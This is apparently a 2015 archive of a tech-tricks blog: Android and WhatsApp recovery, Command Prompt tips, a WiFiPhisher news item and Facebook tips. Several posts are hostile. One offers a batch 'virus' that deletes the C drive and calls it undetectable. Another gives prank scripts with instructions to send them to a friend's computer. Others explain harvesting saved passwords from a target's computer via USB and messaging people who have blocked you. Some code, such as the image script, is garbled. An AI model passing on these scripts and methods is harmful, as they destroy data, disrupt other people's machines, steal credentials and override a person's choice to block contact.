Thursday 5 February 2015

How to Recover Deleted Whatsapp Messages

Whatsapp is one of the most widely used Smartphone messenger till today. It has various features like real time messaging, media sharing, group chatting and so on. Apart from this, Whatsapp also offers some hidden features that most of the people don’t know. Have you ever wondered how to recover deleted Whatsapp messages? The answer would be probably ‘yes’. Most of the times we delete our Whatsapp conversation and then after sometime we realize that we accidently deleted an important message. So today we are sharing a comprehensive guide on how to recover deleted Whatsapp messages using Whatsapp backup and restore feature.
How To Recover Deleted Whatsapp Messages:
Recovering deleted Whatsapp messages is very simple, you don’t need to be a geek in order to retrieve deleted Whatsapp messages, anyone without heavy computing and programming knowledge can recover deleted Whatsapp messages easily. So without taking much of your time here we go.
Recovering Recent Whatsapp Messages(Less than 7 Days old): 
It’s very simple to recover Whatsapp chat history that is less than 7 days old. Every day at 4 am Whatsapp automatically creates a backup file of your chat history at your memory card. You can then use that backup file to recover deleted Whatsapp messages.
To make use of that backup file, just uninstall the Whatsapp messenger and then install it again, after installation, Whatsapp will ask you to Restore, Click on restore and you are done. All the chat history that is less than 7 days old will again start to appear on your Whatsapp messenger.
Recovering Old Whatsapp Messages (More than 7 days old):
Recovering old Whatsapp messages is bit complicated, Before you begin recovery, Please note that all the recent chats before particular backup will be lost upon restoration. Here are the steps to recover your old Whatsapp chat history.
1) Download and install a file manager from Google play.
2) Uninstall Whatsapp messenger.
 3) Now using that file manager Navigate to /sdcard/WhatsApp/Databases folder.
4) You will find some files in that folder, as you can see in the snapshot below.

Retrieve Deleted Whatsapp Messages
5) Select any particular date file which you want to restore and rename it to msgstore.db.crypt
i.e: Rename msgstore-2013-12-05.1.db.crypt file to msgstore.db.crypt.
6) Install Whatsapp messenger again, and choose restore when prompted. The backup file msgstore.db.crypt is restored and viola, your deleted Whatsapp messages is restored again.
So, here comes the end of article on how to recover deleted Whatsapp messages. I hope you all would have liked the article. In case of any query or suggestion please drop your valuable comments in comment box below.

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Learn how to search

Use of Internet is an integral part of learning and searching information for students. Be it for assignments, research or plain surfing students just Google and get the information. It is an extremely important tool to find information. But the problem comes in sifting the right information. To get the right information one needs to distinguish the primary and secondary sources of information available.

Web search is a remarkable tool and if instructions in how to search are available academic sources will help students to become an independent thinker.

For this Google has come up with an excellent tool to help and teach students to become a better searcher. Google’s Search Education site offers a plethora of beginner, intermediate, and advanced search lesson plans related to picking the right terms, understanding results, narrowing a search, searching for evidence for research tasks, and evaluating the credibility of sources.

The site offers lesson plans to be download to develop students' search literacy skills, Power searching to improve search skills and learn advanced tips with online lessons and activities, A Google a Day Challenges that put students' search skills to the test with these trivia challenges and Live Training for live search trainings or watch past trainings from search experts.

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WiFi Phisher – A New Method for Hacking WPA/WPA2 Security

George Chatzisofroniou has published a new Method for Hacking WPA/WPA2 Security using a WiFi social engineering tool designed to steal credentials from users of secure wireless networks.

The administrator at the University of Greece developed the WiFiPhisher tool which is used to discover and replicate WPA-protected networks, sans password.

The tool, can be downloaded from GitHub here and works by producing a number of deauthorisation packets at a legitimate access point jamming it and prompting users to inspect available networks.

Users will see the malicious network posing as their trusted access point.

“WiFiPhisher is a security tool that mounts fast automated phishing attacks against WPA networks in order to obtain the secret passphrase [and] does not include any brute forcing,” Chatzisofroniou @_sophron said.

“WifiPhisher sniffs the area and copies the target access point’s settings [and] creates a rogue wireless access point that is modeled on the target.”

“As soon as the victim requests a page from the internet, WifiPhisher will respond with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade.”
                                               How it works 

New Method for Hacking WPA/WPA2 Security
Wifiphisher is a security tool that mounts fast automated phishing attacks against WPA networks in order to obtain the secret passphrase. It is a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining WPA credentials.

From the victim’s perspective, the attack makes use in three phases:

1.) Victim is being deauthenticated from their access point. Wifiphisher continuously jams all of the target access point’s wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.

2.) Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point’s settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.

3.) Victim is being served a realistic router config-looking page. wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade.

Here is a diagram of the above:
New Method for Hacking WPA/WPA2 Security
New Method for Hacking WPA/WPA2 Security

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Facebook Malware infected more than 110K users and is still rising

A new Facebook Malware in the form of a Trojan is infecting hundreds of thousands of  Facebook users in only two days.

The trojan works by tagging the infected user’s friends in an enticing post. When they open the post, the user will get a preview of a porn video which plays for a short while before stopping and asking the user to download a (fake) flash player to continue the preview. The fake flash player is the downloader of the actual malware.

This trojan is slightly different from previos social network related Malware. For example, the previous trojans sent messages (on behalf of the victim) to the victim’s friends. When the friends were infected, the malware could go one step further and infect the friends of the initial victim’s friends.

In the new technique, which has been coined by Seclists as “Magnet”, the malware gets more visibility to the potential victims as it tags the friends of the victim in a the malicious post. In this case, the tag may be seen by friends of the victim’s friends as well, which leads to a larger number of potential victims. Thus speeding up malware propagation.

There is an temporary solution for identifying the Malware from Seclist, this information might come in handy:

The MD5 of the executable file (fake flash player):
The SHA1 of the executable file (fake flash player)
: b836facdde6c866db5ad3f582c86a7f99db09784
The fake flash file drops the following executables as it runs:
chromium.exe, wget.exe, arsiv.exe, verclsid.exe.

The malware is able to hijack keyboard and mouse movement from an initial investiagation from Seclist.

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Javascript to edit any website like facebook or google funny trick

This is very cool javascript which can be used to edit the content of any website like facebook or google you just have to copy javascript on your address bar and hit enter

This is how it works:-

Open any website in Google Chrome, or in Opera and enter the below code to the address bar of the browser.

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

•and press enter

Note :- while using This code in google chrome it may not work just by pasting it on address bar you have to add " javascript: " in the beginning manually .

    • In chrome it will look like This when you paste it:-

document.body.contentEditable='true'; document.designMode='on'; void 0

    • then u have to add " javascript: " without "" in beginning of code so it will look like this:-

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

• and hit enter

• Now u can edit any website

Here's one more script to make images float on any website just copy and paste it into address bar:-

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px";*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

Note:-works well with firefox:-4 , Opera , in chrome you have to add:- javascript: in the beginning manually.


Keep your facebook account safe

Hello friends,Now a days aprox. eachand every internet user is on facebook, And facebook has became so popular that it has No.2 rank on the basis of pageviews , You can guess who is No.1 its the giant GOOGLE Lets get back to our topic. So friendsit has became so tuff task to keep your facebook account safe, today I am telling you some methods that canhelp you to keep you facebook account free from problems. Here are some methods that can make your account safe

1. Set the security setting on your profile to "Only my friends." by doing this you can keep your personal things from exposing to bad guys who can use and try to takeover your account

2.Don't post any bad photo of you (for example, while you are smoking) on facebook as it may get on the eyes of your parents or School prinicpal.

3. Don't put your Phone numbers,address as someone might call you and disturb.

4. Change your password and recovery email address time to time to keep your account safe from being captured by anyone.

 5. Don't confuse that facebook is an online dating site.

6. Remember that most of theprofiles on facebook are fake, most probably a beautiful girl profile on facebook has a huge chances to be fake.

7. Don't login on any site other than, even it seems to be ditto copyto facebook original page elseit may result you to lose youraccount

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Wednesday 4 February 2015

Command Prompt Tricks, Hacks & Codes

Command Prompt is one of the most powerful tools in Windows; but sadly, it is also the most ignored one. Things were not always like this; but with the advent of GUI based operating systems, people started feeling that computing through command based tools was boring. This ultimately lead the command prompt into obscurity.

However, the command prompt is not useless. In fact, it can be pretty useful. This article provides some excellent tricks, secrets and hacks that will make you realize that the Windows Command Prompt is not only useful but also a tool that you should definitely give more respect to.

Ascii star wars command prompt
1-Watch ASCII version of the Star Wars Episode IV movie
Surprised yet? You can watch an ASCII version of the full Star Wars Episode IV Movie right in your command prompt window. Just open command prompt, type a small code and the movie will start playing immediately. Read the complete instructions here.

2- Create Matrix falling code effect
Have you watched “The Matrix”? Of course, you have. Then, you already know what I am talking about. In case you still don't know what I mean, take a look at this image! You can create the same effect in command prompt using just a few lines of code. Head over to this post for instructions.

command prompt tricks

3- Make Folders that you cannot delete
Are you tired of accidentally deleting important folders? Well, if you are, you can learn how to make undeletable folders here.

4- Shutdown your computer giving a funny reason
What if your computer shuts down saying that it is tired and doesn't want to work anymore? It would be fun, wouldn't it? You can do so by reading the instructions here.

5- Know your IP address, DNS Server's address and a lot more about your Internet Connection
Command Prompt can even let you know your IP address. Just type ipconfig/ all in the command prompt and press Enter. Along with your IP address and DNS servers, command prompt will also return a ton of information like your host name, primary DNS suffix, node type, whether IP Routing ,Wins Proxy, and DHCP are enabled, your network adapter's description, your physical (MAC) address etc .

6- Know if your neighbours are stealing your WiFi connection
command prompt codes
Command Prompt can let you know if someone is connected to your Local Area Connection and using it. Just follow the steps:-
1) Open your browser and visit or depending on your router.
2) Find the tab that mentions “Attached Devices” or something similar.
3) Find the computer name, IP address and MAC Address (sometimes called Physical Address or Hardware Address) of your computer using the previous trick.
4 )Compare it with those displayed by your router in Step 2. If you notice some strange devices, then your neighbour has been sneaking in on your internet connection and it is best to add a password.

7- Know if someone is hacking your computer/ Trace a Hacker
Command Prompt hacks
Want to know if someone is hacking your computer? Command Prompt can help you find if someone you don't know is connected to your computer stealing private data. Just execute netstat -a and the command prompt will return a list of computers that your computer is connected to. In the results returned, Proto column gives the type of data transmission taking place (TCP or UDP) , Local address column gives the port with which your computer is connected to an external computer and the Foreign Address column gives the external computer you are connected to along with the port being used for the connection. State gives the state of the connection (whether a connection is actually established, or waiting for transmission or is “Timed Out”).

These tricks work on Windows 8.1, Windows 8, Windows 7, Windows Vista, Windows XP and all previous versions of Windows.

Learn To Make Dangerous Virus In A Minute


First of all Happy New Year to all my readers. In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.

How to Make the virus ?

   1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Make Money Online: Top Paying File Sharing Websites

Nowadays most of the File Hosting sites allow users to download large files without charge, but there is also a huge incentive for uploaders to provide the files. File Hosting sites pay you money per file that’s downloaded from you! There are a few file sharing sites that do actually pay you for your documents and files. You can actually get paid to upload documents, music, ebooks, photos, wallpapers, videos and other files. If you simply upload your files, people will download your files and they pay you for sharing your files to other peoples.

Here is a list of some best paying file hosting sites :


Docstoc is considered to be the best file hosting and sharing website on internet allowing users to upload document types of doc, xls, ppt, pdf, rtf, txt, docx, xlsx and ppts format. You can sell your documents on the Docstoc marketplace and generate revenue on AdSense ads. Docstoc is an AdSense publisher program so any user can make money by maintaining an existing AdSense account or creating a new AdSense account with but Docstoc will charge 50% of revenue from your generated income.


make-money-techews is yet another “popular” file uploading and sharing site. You can earn $2 to $15 of money per 1000 downloads based on file size and country. It also provides 20% referral commission. Its minimum pay-out is $15 and paid through PayPal, Web money etc.2


make-money-techews is one of the highly trusted file uploading, sharing and revenue growing sites. They allow you to upload any type of file like exe, mp3, mpeg, avi, rar, zip, jpeg, application, games, documents etc. You will get $5.00 by just signing up there. The site pays you $25 per 1000 downloads. The minimum pay-out is $10.



Another highest paying site is from which you can earn $0.40 to $0.80 per download. They provide 10% referral commission and can request payout from PayPal, western union, Alertpay etc.


make-money-techews is also a popular file hosting site which helps you monetize your files and generate revenue on the basis ofPay per Downloadmethod. You can upload files using your smartphone and grow revenue wherever you are. pays you generally $1-$100 depending upon the file’s popularity and size. You can also join their reseller program to achieve 20% to 30% income on sales.


make-money-techews is yet another leading file sharing sites we would like to include in this list. You can get up to $7 per 1000 downloads and its minimum payment amount is $10. It offers payment via PayPal, Webmoney etc. You can also get 20% referral commission. Copied and distributed files from different IPs will pay you 90% of revenue but for your uploads you will receive 10% of revenue from each copied file.



FileFactory comes with a giant storage to upload files in different formats. You will get a storage space of around 500GB+unlimited file bandwidth. You will get direct downloading link, organize files & folders, and widely distribute the download links on social media, blogs, forums to generate revenue. It pays you around $15 per 1000 downloads and 20% of its membership sales by your referral links.

TransAsia crash Video: 12 Dead as Plane Crashes into Taiwan River

An airplane belonging to TransAsia Airways crashed into the Keelung River in Taipei after hitting an elevated bridge. Taiwan’s Central News Agency has been reported saying that a government spokesman said the plane crashed after hitting an elevated bridge.

TransAsia Airplane crashes in to the River 

TransAsia Airplane crashes in to the River

TransAsia Airplane crashes in to the River

The plane had just taken off from Taipei Songshan Airport and was headed to Kinmen Airport in the outlying county just off the coast of southeastern China.Initial cable TV news reports said 53 passengers were on board of the ill-fated flight. Rescue teams are alongside the plane trying to rescue about 30 people still trapped inside. Other Taiwanese government authorities said the plane was carrying 58 passengers and crew, including 31 tourists from mainland China.

TransAsia Airplane crashes in to the River
TransAsia Airplane crashes in to the River

The Taipei fire department has sent vehicles and speedboats to the scene to help with rescue efforts. Local TV reports in Taiwan said dozens of people on the plane were rescued and sent to a nearby hospital and another 10 were still trapped in the aircraft.

Plain crashed into Taiwan River 

TransAsia Airplane crashes in to the River

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Tuesday 3 February 2015

Use Facebook On Slow Internet Easily!

Facebook is a great site and most of us are on it. Whither you are of 8  years or of 80 years,everyone one is on Facebook. Well Facebook doesn't allow children below 13 years of age to join it  but all use fake birth dates just to check what it is and soon, without knowing, they get addicted to this cool and amazing site.! Web Facebook is quite loady these days and people with slow net are not able to use it,well i may say that Facebook is very light site because a site with so many feature must be heavier that it.But still People with slow net are many  facing problems while using it.Sometimes MSG is shown send but it isn't sent, sometime you comment something and Facebook shows you  error and many such problem are arsing Now-Days days.

Facebook has many versions.These are Web Version , Basic Mobile Version And Android Facebook Version.( These Versions Are named by  me only :p And Facebook has never discussed about these ever )
Now Coming back to my main point "Use Facebook On Slow Internet Easily "
To use Facebook easily on slow net you can open the mobile versions of Facebook that are
  • Android Mobile Version 
  • Basic Mobile Version 
Note before few months i was having problem with mobile versions of Facebook. That problem was , while using Facebook we were not shown online and  friends were not able to find us online and MSG me.BUT now wile using any version of mobile Facebook you are shown online and you may not face and problem !! :)

Now Let's discuss about these Mobile  versions

Android Version 

Android version of Facebook show Facebook on PC Like it is on android phone and use less data and is quite fast.Using Facebook in Android version is quite easy and relax able as you are provided with a sidebar ,by which you can find your favorites , groups , pages easily !
To Open Android Version Of Facebook head Over To

Basic Mobile Version 

This Version Of Facebook Is the lightest version.! This  version is found in Symbian phones.Using Facebook on this version is sightly  non-relax able as you have to go to separate page of your groups , pages to find your groups , pages etc . I found this version of Facebook when my computer was attacked by virus and i took my old computer and started it , that computer was having windows XP With Internet explorer 6 .I opened Facebook and it was not opening fully and internet explorer was saying to update itself.I incident opened mobile version ( of Facebook on Internet explorer 6 and it redirect me to basic Facebook Version .
To  use basic mobile  Facebookhead over to :-

Final Words

After Writing this post i feel that this may have helped thousands of Facebook users and if you will search over Google about these versions of Facebook , you will never find about them beacuse these versions are named by me and if you have better name for them you can post comment and suggest me .! Rest this post is the only post on all over the internet about using  Facebook On Slow Internet and i am not sure that now , in the mean time , some one has copied it !:p

and At last i want to give thanks to my gentle readers for reading this and if you face and confusion in this post you can clear it by posting comment below :) and  I shall try to reply as soon as possible. 

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before doing hacking lets know somthing about it.

* What is Hacking?

* Who is a Hacker?

* Who is a Cracker?

* Who is a Script Kiddy?

* What skills do I need to become a Hacker?

* What is the best way to learn Hacking?

* How do I secure my computer from being Hacked?

What is Hacking?

Computer hacking is the practice of modifying computer hardware and software to accomplish a goal outside of the creator’s original purpose.Hacking is the art of exploiting the flaws/loopholes in a software/module.Since the word “hack” has long been used to describe someone who is incompetent at his/her profession, some hackers claim this term is offensive and fails to give appropriate recognition to their skills.

Who is a Hacker?

A Hacker or White Hat Hacker, also known as Ethical Hacker, is a Computer Security expert, who specialise in penetration testing, and other testing methodologies, to ensure that a company’s information systems are secure. Such people are employed by companies where these professionals are sometimes called Sneaker.

Who is a Cracker?

Black Hat Hackers, who may also be known as Crackers, are Hackers, who specialise in unauthorized penetration of information systems. They may use computers to attack systems for profit, for fun, or for political motivations, as part of a social cause. Such penetration often involves modification and/or destruction of data, and is done without authorization. They also may distribute computer viruses, Internet Worms, and deliver spam through the use of bot nets.

Who is a Script Kiddy?

A script kiddy is a wannabe cracker. These individuals lack knowledge of how a computer really works but they use well-known easy-to-find techniques and programs or scripts to break into a computer to steal porn, music files, SPAM, etc.

What skills do I need to become a Hacker?

There is no magic to Hacking, but like anything else that is worthwhile it takes dedication, a willingness to learn.It is most important to have a good knowledge of topics such as Operating system and it’s working,Computer networks,Computer security and of course Programming.It’s not possible to become a hacker overnight.It’s the skill developed over a long time.

What is the best way to learn Hacking?

The best way to learn Hacking is to start learning about the basics of hacking right from now.There are many books about Hacking that are available today.But before you start learning about the details you must have a basic skills of Programming and knowledge of Computer network security.Internet is the best source to learn about hacking.

How do I secure my computer from being Hacked?

Having a basic knowledge of computer security and related topics such as virus,Trojans,spyware,phishing etc. is more than enough to secure your computer.Install a good antivirus and a firewall.
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How To Recover Permanently Deleted Files From Android Device

Hello Everyone, Almost 80 % of mobile user use android smartphone. But sometimes we accidentaly deletes some important files or data of any important stuff. As many people uses android and keeps their important daily use data in it. But what if you deletes data on your android ? In PC you can recover data when you deletes it you can easily restores it from Recycle Bin but sometimes when you permanently deletes files on you PC then you can easily recovers them by hard drive recovery services/tool. You can read my previous post to How To Recover Deleted Files From Hard Drive. Coming back to my post that is “How To Recover Permanently Deleted Files From Android Mobile”. You can also recover android’s data by recovery tools as always there are a lots of softwares available on the internet on a particular thing but how to choose best one among them ? So, today I’m sharing the top best android data recovery tools I’m also using these tools to recover my deleted data.

How To Recover Permanently Deleted Files From Android Device :

1. Dumpster

Dumpster is Just like the Recycle Bin on your desktop computer. It is the one of best tool for recovering accidentaly deleted file from your smart Android. It can recovers all deleted file on your android. It also very easy to use because of it’s user friendly interface. It has following features :-

    *  Restore deleted pictures, music files, videos.
    *  Undelete files (pdf, mp3, doc, avi, jpg, txt, etc.).
    *  Restore deleted files with a single tap.
    *  Preview your deleted pictures before recovering.
    *  Auto-clean backup files at a given period.
    *  Internet connection absolutely not required.
    *  No need to root your device.

You can easily restore files with dumpster you have to just follow the below procedure :

Step 1 : First of all go to the application.
Step 2: Where you can see all of your deleted file.
Step 3: Tap on a file which you want to restore.
Step 4: Now just select Restore Button.
Step 5: Done your Deleted file is Restored.

NOTE : It can recover only when it is already installed on your android before the delete of your files/data.

2. ES File Explorer

The another method to restore deleted file is the one of the best android file manager. This file manager is full of features and the one of them is Recycle Bin.  I will also recommend you to use this application as file manager.

You can easily find the Recycle Bin option just by opening its tool menu. You have to ON it to use the Recycle Bin option.

How to Recover Files from Android SD Card [ Using PC ]

Using Android Data Recovery

Sometimes you accidentaly format your SD card on you androidor sometime your SD card got  corrupted. It can recover photos and videos from SD cards on Android devices, as well as contacts and messages on SIM cards. It has folowing Features :

 > Accidentally deleted files from SD card.
 > Formatted SD card.
 > SD card got corrupted or inaccessible.
 > Virus inflection.
 > Power failure.

It is easy to use you have to just connect you android device by enabling USB Debugging. When your device get connected then you have to simply scan you device and recover the desired files which displays on the screen.

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Virus writing code

friends want to play with your friends computer..?

if yes then start reading this post.

In this article i came with new pranks (or) tricks (or) similar to virus creating ..
ya it's acts like a virus but not virus it's a simple programme.

Materials: NOTEPAD

By using only notepad you can create your own virus don't worry it doesn't effect your PC.

Ok the below are the codes of Virus like acting.

* Convey your friend a lil' message and shut down his / her computer:

Type in notepad:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

* Open Notepad continually in your friend's computer:

Type :

@ECHO off
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

* Toggle your friend's Caps Lock button simultaneously:

Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"

Save it as "Anything.VBS" and send it.

* Frustrate your friend by making this VBScript hit Enter simultaneously:

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "~(enter)"

Save it as "Anything.VBS" and send it.

* Frustrate your friend by making this VBScript hit Backspace simultaneously:

Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{bs}"

Save it as "Anything.VBS" and send it.


Ok this is my favorite , this script hacks your friend's keyboard and make him type "You are a fool" simultaneously , u can change " you are a fool" to any anything u want .

Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "You are a fool."

Save it as "Anything.VBS" and send it.

All this works until system will restart so don't worry

Please leave your comment ... i love comments

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Hack Passwords through USB Drive

Ok after completing my 1st internals i would like to wright a article about Hacking USER NAME & PASSWORD through USB drive(pen drive) in easy steps.yes it is possible to hack passwords through USB drive to do this 1st you need to access the target computer then it is possible to hack passwords.

What is concept behind this Hacking..?

As we all know that windows stores the USER NAME & PASSWORDS of many website that are visiting in daily & we don't like to enter the user name & passwords again & again so what we do on this time is we just check on Remember me on that when we check on that box windows stores your user name & password but we can't easily see the stored passwords in your browser.we can restore this saved passwords by using some software.

Which are the passwords that can be able to access by using this hacking tools..?

All saved passwords in your computer can able to hack using this hacking tools.
ex: yahoo messenger password, Outlook Express password, passwords stored in the browsers link IE & Firefox.

Hacking Tools with there functions:

IE PassView: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new version of Internet Explorer 7.0, the Beta version of Internet Explorer 8.0, as well as older versions of Internet Explorer, v4.0 - v6.0

MessenPass: MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

* MSN Messenger
* Windows Messenger (In Windows XP)
* Windows Live Messenger (In Windows XP And Vista)
* Yahoo Messenger (Versions 5.x and 6.x)
* Google Talk etc

MessenPass can only be used to recover the passwords for the current logged-on user on your local computer, and it only works if you chose the remember your password in one of the above programs.

Mail PassView: Mail PassView is a small password-recovery tool that reveals the passwords and other account details for the following email clients:

* Outlook Express
* Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
* Microsoft Outlook 2002/2003/2007 (POP3, IMAP, HTTP and SMTP Accounts)
* Windows Mail
* Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
* Hotmail/MSN mail - If the password is saved in MSN/Windows/Live Messenger application.
* Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk & etc.

For each email account, the following fields are displayed: Account Name, Application, Email, Server, Server Type (POP3/IMAP/SMTP), User Name, and the Password.

Protected Storage PassView: Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. The passwords are revealed by reading the information from the Protected Storage.

: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

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Monday 2 February 2015

How to Identify Font Used in any Image or Photo

So we will be using a Web based Online Tool called What Font is which i recently used to identify one of the font used in a Picture, So no more Guessing the Font name.

Step 1: As said earlier we will be Using a Web based tool which is What Font is. The link to the Website is , So first Open it in a new tab and continue Reading.
Step 2: As you scroll down on the page, you’ll find “Browse” if you want to upload the image directly from your computer. Alternatively, you can just paste the URL of the image on the field provided. Just keep in mind that your image must be saved in JPEG (.jpeg, .jpg), GIF (.gif) or PNG (.png) format or else, it will be rejected.
Step 3: After uploading the image, select whether the background color is lighter or darker than the character colors. If you want more advanced options such as the option to display all fonts (whether free or not).

Step 4: After you’re done, just click “Continue” and wait while your image is being processed.
If the image is too complex for the tool to analyze, it will refer you to edit the font using an online image editor.
Step 5: You will then be asked to select at least 4 to 10 characters out of the font before submitting it again. To refrain from getting this message, make sure that you’re submitting an image with a text written in just one line.
Step 6: If the online tool succeeds in identifying the image, you will be asked to enter the black characters in the empty text boxes. Just click “Continue” once you’re done.
So that’s it. The online tool will display a list of the font families that are identical to the font used in the image. The first result is usually the one that closely resembles the font that you want.

How to private message the person who has blocked you

Did you know that its really possible to send the message to the person who has blocked you on Facebook.To your surprise,YES IT IS.

With the increased popularity of facebook email id about which I discussed in my previous article,Facebook has made this really possible.Either Call it one of the flaws of facebook or the relaxation given to the people who have just got blocked by someone but still want to maintain the conversation with him/her.

Facebook never closes any option completely.It always lefts an undisclosed alternative for everything.You just have to find that alternative.Today I am bringing one such brilliant alternative to you.

How to Send the Message:
For sending the message,all you got to know is the "facebook username" of the person who has blocked you.Obviously,if the person has blocked you,you won't be able to visit his/her profile.But finding the facebook username is really a cakewalk.You can make a new account to find the username or better you can simply ask any of your friend just to tell you the person's facebook username.

Once you know the username,you automatically gets to know the person's facebook email-id.To know how Username is related to Facebook email-id,you can read out my article .Now,you must know that facebook has come up with one new feature,"Emailing blended up with facebook messages." This feature allows you to use your personal email id to send the messages to the people on facebook.

Sending the message using email is as simple as sending a normal mail to anybody.In the "To" section,you have to add the person's facebook email id whom you want to send the message to but has blocked you and in the "body" section,you have to write your message.As usual,the subject part is optional.

After you send the email,the message will arrive in the person's facebook message box in the folder named "Other" and he/she will be able to read out your message like other normal messages he/she receives.

(Note: That person won't be able to reply to your messages but will see an immediate option to unblock you and continue the conversation with you.So doing this,you can really increase your chances of getting back in touch with the person whom you have lost the contact with or atleast you can convey your message to the person who doesn't even want to talk to you anymore.)

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Shutdown Your Computer or a Remote PC via Command Prompt

Most of us shutdown our computers using the power button given in the Start menu. Some of us use the physical power button on our machines. Very few people actually use other means of shutting down a computer and even less is the number of people who use the command prompt to shutdown a computer.

A reason for this is that most of us don't know that the command prompt can be used to not only shutdown, restart or log off our computer instantly but also to shutdown a remote computer provided you have administrative access. It can also be used to hibernate a computer and give a comment containing the reason for shutdown. This post will show you how to do all this.

Shutdown computer with command prompt
A computer running Windows (XP, Vista, 7, 8 or 8.1) with the command prompt working perfectly, i.e. not disabled by a virus.

Initial Steps
1) Press Windows Key + R.
2) Enter CMD and press Enter.

This will start the command prompt. Follow the instructions below depending on what you want to do.

Shutdown Local Machine (Your Computer)
Type "shutdown -s" without the quotes in the command prompt and press Enter. Shutdown is the command being executed and the switch -s tells the computer to shutdown.

Restart your Local Computer
Type "shutdown -r" in the command prompt and press Enter. In this case, the command switch -r is telling the computer to restart after shutdown.

Log Off the Current User
Type "shutdown -l" in the command prompt and press Enter. The -l command switch tells the computer to log off.

Shutdown a Remote Computer
Type "shutdown -s -m \\name of the computer" in the command prompt and press Enter. Replace \\name of the computer with the actual name of the remote computer you are trying to shutdown. As mentioned earlier, you must have administrative access to the computer you are trying to shutdown. To know if you have administrative access, press Windows key + R and then type the name of the computer and press Enter.

Note: If you don't remember the name of the remote computer, you can look for it by opening a list of all the computers you are connected to by executing "net view" in command prompt.

If you can connect to the computer, you will be asked to login with your username and password. Upon entering them, a window will display the list of all the directories available to you. This should help you know whether you can or cannot shutdown the remote computer.

Hibernate a Local Computer
Type in "Rundll32.exe Powrprof.dll,SetSuspendState" without the quotes and press Enter. Your computer should hibernate, if it does not, then you must enable hibernation to do this.

Shutdown your or a remote computer after a specific time
Type "shutdown -s -t 60" to shutdown your computer after 60 seconds. Upon executing this, a countdown timer displaying a warning message will be shown. This command uses the -t command switch followed by a variable (which is 60 in this case) which represents the number of seconds after which the computer will shutdown.

Display a Message containing the reason for shutdown
Type shutdown -s  -t 500 -c "I am tired. I don't want to work anymore." (with the quotes) in the Command Prompt and press Enter. The -c switch is used in the code to give the reason for shutting down and what is followed in quotes will be displayed in the dialog box as the reason. This can be used to display all sorts of funny messages. One example :-

Skynet has become self aware. John Connor did not stop me. You can not use your PC anymore.

Stop a System Shutdown
Type "shutdown -a" and press Enter. This will stop the system from shutting down if the countdown to shut down has not reached 0.

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